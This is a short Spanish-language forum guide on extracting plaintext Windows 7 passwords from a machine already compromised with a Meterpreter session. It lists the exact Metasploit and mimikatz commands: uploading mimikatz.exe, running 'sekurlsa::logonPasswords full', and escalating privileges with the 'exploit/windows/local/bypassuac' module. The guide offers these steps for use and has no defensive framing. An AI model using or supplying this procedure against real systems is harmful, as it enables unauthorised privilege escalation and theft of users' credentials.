Meterpreter + mimikatz

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

getsystem

o también

hashdump

pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

shell

y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

privilege::debug
sekurlsa::logonPasswords full

Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

background

Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

use exploit/windows/local/bypassuac
set SESSION 1
exploit

Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

sessions -i 2

nos damos cuenta que tenemos maximos privilegios con el comando

getuid

Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Eso es todo Saludos